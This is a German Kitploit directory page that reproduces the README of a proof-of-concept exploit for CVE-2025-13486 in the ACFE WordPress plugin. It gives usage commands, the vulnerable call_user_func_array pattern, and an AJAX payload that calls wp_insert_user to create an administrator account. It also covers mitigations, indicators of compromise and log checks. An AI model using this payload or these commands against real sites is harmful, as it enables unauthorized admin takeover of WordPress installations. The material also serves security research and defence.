Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Admin-Erstellung | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Admin-Erstellung

Repository anzeigen
111vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔴 CVE-2025-13486 - Exploit für das WordPress-Plugin Advanced Custom Fields Extended (ACFE)

WordPress Python License Status

WordPress-Logo

📋 Übersicht

Proof-of-concept-Exploit für CVE-2025-13486, eine kritische Schwachstelle im Advanced Custom Fields: Extended (ACFE) WordPress-Plugin, die Remote Code Execution ermöglicht, was zur Privilege Escalation führt.

🎯 Schwachstellendetails

AspektDetails
CVE IDCVE-2025-13486
PluginAdvanced Custom Fields: Extended (ACFE)
TypRemote Code Execution → Privilege Escalation
RisikostufeCritical
Betroffene VersionenACFE anfällige Versionen (spezifische Versionen noch offen)
CVSS Score9.8 CRITICAL
Entdeckungsdatum2025
Autor0xgh057r3c0n

⚠️ Haftungsausschluss zur ethischen Nutzung

⚠️ WARNUNG: Dieses Tool ist NUR für autorisierte Sicherheitstests und Bildungszwecke bestimmt.

✅ Erlaubte Verwendung:

  • Sicherheitsforschung und -bildung
  • Testen eigener Systeme
  • Autorisierte Penetrationstests mit schriftlicher Genehmigung
  • Akademische Forschung und Lehre
  • Sicherheitsbewusstseinstraining

❌ Verbotene Verwendung:

  • Unautorisierte Tests an Systemen, die dir nicht gehören
  • Böswillige Angriffe oder Hacking
  • Jegliche illegale Aktivitäten
  • Verstoß gegen Computerbetrugsgesetze (CFAA usw.)
  • Unethische Sicherheitstests

Der Autor haftet nicht für jeglichen Missbrauch dieses Tools. Holen Sie immer eine ordnungsgemäße schriftliche Genehmigung ein, bevor Sie ein System testen.

🔧 Funktionen

🔍 Verifikationsmodus

  • Nonce-Extraktion aus WordPress-Seiten
  • Schwachstellenbestätigung mittels print_r-Funktion
  • Sichere Verifikation ohne Ausnutzung
  • Mehrfaches Pattern-Matching zur Nonce-Erkennung

⚡ Exploitationsmodus

  • Erstellung administrativer Benutzer via wp_insert_user
  • Benutzerdefinierte oder zufällig generierte Anmeldedaten
  • Unterstützung für benutzerdefinierte Benutzernamen, Passwörter und E-Mails
  • Antwortanalyse auf Erfolgsindikatoren

🛠️ Technische Funktionen

  • Automatische Protokollerkennung (HTTP/HTTPS)
  • Farbcodierte Terminalausgabe
  • SSL-Verifikationsumgehung für Testumgebungen
  • Detaillierte Fehlerberichterstattung und Fehlersuche
  • Sitzungszeitüberschreitung und Verbindungshandling

📦 Installation

Voraussetzungen

  • Python 3.6+
  • requests Bibliothek

Einrichtung

root@kitploit:~
# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Install dependencies
pip install requests

# Alternative: Install from requirements.txt
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

Abhängigkeiten

Erstelle eine requirements.txt-Datei:

root@kitploit:~
requests>=2.25.1

🚀 Verwendung

Grundlegende Syntax

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

Beispiele

1. Nur Schwachstelle verifizieren (Sicherer Test)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. Exploit mit zufälligen Anmeldedaten

root@kitploit:~
python3 exploit.py --url https://target.com

3. Exploit mit benutzerdefinierten Anmeldedaten

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Ziel ohne Protokoll (Auto-Erkennung)

root@kitploit:~
python3 exploit.py --url target.com --verify

Befehlszeilenoptionen

OptionBeschreibungErforderlichStandard
-u, --urlZiel-WordPress-URLJa-
--verifyNur verifizieren, keine AusnutzungNeinFalse
--userBenutzerdefinierter Benutzername für AdminNeinadmin_XXXXX
--passwordBenutzerdefiniertes Passwort für AdminNeinZufällig 12 Zeichen
--emailBenutzerdefinierte E-Mail für AdminNein[email protected]

🧪 Funktionsweise

1. Schwachstellenmechanismus

Der Exploit nutzt eine fehlerhafte Funktionsbehandlung im acfe/form/render_form_ajax-Endpunkt des ACFE-Plugins aus, was Angreifern erlaubt, beliebige PHP-Funktionen aufzurufen.

2. Technischer Ablauf

root@kitploit:~
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators

3. Exploit-Payload

root@kitploit:~
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Gegenmaßnahmen

Sofortmaßnahmen

  1. Plugin aktualisieren: ACFE-Plugin sofort auf die neueste Version aktualisieren
  2. Plugin entfernen: Falls kein Update verfügbar, ACFE vorübergehend deaktivieren
  3. Web Application Firewall: WAF-Regeln bereitstellen, um bösartige Anfragen zu blockieren
  4. Überwachung: Auf verdächtige Admin-Benutzererstellung achten

WordPress-Sicherheitshärtung

root@kitploit:~
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Erkennung

Indikatoren einer Kompromittierung (IOCs)

  • Nicht autorisierte Admin-Benutzererstellung
  • Verdächtige AJAX-Anfragen an /wp-admin/admin-ajax.php
  • Anfragen mit action=acfe/form/render_form_ajax
  • Unerwartete wp_insert_user-Funktionsaufrufe via AJAX

Protokollüberwachung

root@kitploit:~
# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Referenzen

  1. WordPress Plugin Repository: Advanced Custom Fields: Extended
  2. CVE-Datenbank: CVE-2025-13486
  3. WordPress-Sicherheitsteam: Richtlinien zur Plugin-Sicherheit
  4. OWASP Top 10: Injection-Angriffe

🤝 Mitwirken

  1. Repository forken
  2. Erstelle einen Feature-Branch (git checkout -b feature/improvement)
  3. Änderungen committen (git commit -am 'Add new feature')
  4. Auf Branch pushen (git push origin feature/improvement)
  5. Pull Request erstellen

Richtlinien für Mitwirkende

  • PEP 8 Python-Styleguide befolgen
  • Kommentare für komplexe Logik hinzufügen
  • Fehlerbehandlung einfügen
  • Dokumentation aktualisieren

🐛 Probleme melden

Bitte melde Fehler und Probleme über:

  1. GitHub Issues: Neues Issue erstellen
  2. Sicherheitsschwachstellen: Verantwortungsvolle Offenlegung zuerst an den Autor

📊 Projektstruktur

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # Main exploit script
├── README.md           # This documentation
├── requirements.txt    # Python dependencies
├── LICENSE            # MIT License file
├── examples/          # Usage examples
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # Test scripts
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 Autor

0xgh057r3c0n - Sicherheitsforscher

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Erstellt mit ❤️ für die Sicherheitscommunity
⚠️ Verantwortungsvoll und ethisch nutzen ⚠️

Tool herunterladen